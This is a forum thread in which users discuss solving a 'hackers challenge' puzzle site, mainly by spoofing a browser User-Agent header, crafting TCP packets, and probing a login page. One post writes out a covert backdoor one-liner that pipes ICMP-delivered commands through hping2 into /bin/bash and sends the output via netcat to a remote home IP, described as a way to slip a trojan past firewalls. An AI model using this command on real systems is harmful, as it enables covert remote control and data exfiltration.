Hackers Challenge 2 Do you have what it takes to beat this ?

[jipman 0]

Notice from jipman:

Please don't give away the things you need to do to solve the challenges, this would spoil the puzzle for everyone. You may give hints, but not something like, 'download this and do this ... '

I hope you guys understand

In the previous topic ( http://forums.xisto.com/topic/83605-topic/?findpost=1064301480 ) i presented a so called hackers challenge, and now i present to you the sequel

I just felt like making another one and so i have. This one is more difficult than the first one.

You can find it here http://forums.xisto.com/no_longer_exists/

Final note: You have only really hacked this challenge when you see something like, 'here's the password'

If you think you have the right password, PM it to me and I'll add you to this list

Notice from jipman:

Here's a list of all people who have managed to hack this challenge:

- mastercomputers
- gentoo
- qwijibow
- moonwitch
- optykal
- Spectre

[qwijibow 0]

Excelent ! i like these types of problems...The only question is....Should I re-program firefox to report its version as 7.77or should i do some tcp packet crafting.thanks for this...(although i AM supposed to be spending today teaching an artifical neural network to predict changes in the stock market)AGH ! my coursework will never be finished!

[jipman 0]

Well... if it works it works

[qwijibow 0]

this is doing my egg in !!!last time i played this game, i just used telnet.and fed it a special html request.but this server is beeing annoying, it closes the connection as soon as i enter the GET line, before i manage to pass the Host variable.. and therefore i get a 404, because its looking on the main Xisto folder (same ip address and all that)ive tried passing the keep-alive part before i start typign out the GET. but that just kills the connection without any retured html code.i cant be botheres to re-compile forefox, so now im trying to make sence of hping.agh !

[qwijibow 0]

okay.. now im obsessed !so.. the server disconnects after the first transmittion.ive tried to put the whole reguest into a single transmition using \r and \n escape sequences, hoping they will be interpreted as a newline by the server. they are not.so captured the 3 important packets in an http request. using ethereal.the first packet is a SYN packet, the second packet is a ACK, and the 3rd is the actuall http request.i modified the 3rd packet to report firefox version 7.77, then i sent out SYN packet, when the server responded i sent the ACK packet... THEN i transmitted my modified http packet.so as far as the server is concerned, we have just dont a handshake, and sent a request...but the reply tells me im not inbvited to the party.At this point, i decided to cheat...i downloaded the firefox pluggin that automatically spoofs the user agent, i set it to spoof firefot version 7.77 and im STILL not invited ot the party...have you managed to pass this test yourself ?im hoping you set it up wrong :Potherwise.. i give up.

[lacking_imagination 0]

I hate you... Not really, but I dont have firefox at school. I cant do this one. Maybe i should be cool and install firefox...heh~aaron

[moonwitch1405241479 0]

pffttt that was easy LOL....WAY easy!!! qwiji you're looking WAY too far LOLYou don't need firefox to do it, FF just makes it slightly easier. But FF alone won't solve the issue though.

[moonwitch1405241479 0]

Well, I used the extension on FF. That's ONE.BUT you need something from somewhere that you can get easiest using telnet

[jipman 0]

:PI never said that you had to alter something in FireFox, but you guys are thinking to difficult.But qwij, please remove those code snippets :PAnyway, post here if youi get it

[qwijibow 0]

damnit... stuck on the login...this better not need SQL code injection, cos i suck at SQL aswell as PHP.ive tried some good ol Bash insertion... but im pretty much stabbing n the dark... | head -n 20 and all that.cant you write the answers upside down on the bottom of each [age like they to in the newspapers... i NEED to know.

[jipman 0]

neh... that would spoil the whole puzzleYou don't need SQL though, you just need to know about basic PHPmaybe i'll create a sql injection sploit challenge later,

[iGuest 3]

I can get as far as the personal control panel using just Telnet, is there any limits to what we can use?I'm currently at work, so limited to what I can try but I guess this is good enough for a start, I'll finish it when I get back home.Cheers,MCOK I was wrong, maybe my work computer does have enough to get through this.You have hacked me , you win, the pass is ***********.Cheers,MC

[qwijibow 0]

how did you get through the first step with telnet ??ok, its obviouse that you need to pass a "User-Agent: Mozilla FireFox 7.77" and ofcourse the "Host: jipman.astahost.com"but the serber always kills off my telnet session the first time i hit return, it doesnt wait for more input.and \r\n dont seem to be interpreted as newlies by the serrver, they aprear in 404ish server responce.to get past that phase i had ot go hardcore, and capture handshake, and http packets, modify them, then write a little script to send them, and packet sniff the result.Like jipman said, you dont need firefox to complete the first stage, so im counting the pluggin as cheating :Pso how did you do it with telnet ???Ohh, and thatks for this challenge... ive learned soooo much about hping2.did you know that you use hping2 and netcat to penetrate firewalls !!!for example, you could setup hping2 to sniff icmp ping packets.. EVEN if the ping's are blockked by the firewall, and dissables by the kernel,, AND spoofed the from ip adress,hping2 in packet sniffer mode will still get them.you can set hping2 to sniff for icmp ping packets containing a secret key.you pipe the output of hping to /bin/bash then pipe the output of /bin/bash to netcat which will transmit the outpu of the command back to you.hping2 --listen mySecretSendCode --icmp -a Spoofed-Ip-Address | /bin/bash | netcat youHomeIP 80the following will runand code emplanted in a ping, aslong as it contains your secret code, then send the outpu of the command back to you, on an innocent looking ttcp port 80 !Untill today, i thought a statefull firewall dropping all unrelated,a nd unestablished, and new packets would protect me from a trojan.how wrong i was...

[miCRoSCoPiC^eaRthLinG 0]

Bah !! This was jack$**** I got to the so called control panel in no time. You guys are thinking too hard.. Here's what I did.

 

1. Logged into my Xisto shell

2. Used wget to fetch the link with spoofed header:

I hope you don't mind me doing this mse, but i don't like to have answers posted here, that would spoil the puzzle for others

That gave me the header with a ticket number: xxx.xxx.xxx.xxx - and a login page - which I downloaded and edited to make the links absolute. When I tried to use this file to login, I faced the same user agent problem coz FireFox was still reporting wrong version - but I got the URL structure:

same here

 

3. So I used wget again to fetch the page with this URL

Sorry 

4. That got me to the so-called control panel which contained a page like this:

Welcome to your personal control panel

At this moment, you do not have permission to view the serverlogs yet, but you can see the who is logged in at this moment

 

Challenger (you) at Ip address: xxx

 

Jip Man at Ip address: xxx

 

Administrator at Ip address: xxx

BTW, you can use WannaBrowser too, to spoof the headers: http://forums.xisto.com/no_longer_exists/

 

That's it I guess

[qwijibow 0]

Iv us wget almost evey day.... how i wish iwould have once read the man page and discovered the host spoofing !!!!!well... i suppose i just like packet crafting too much !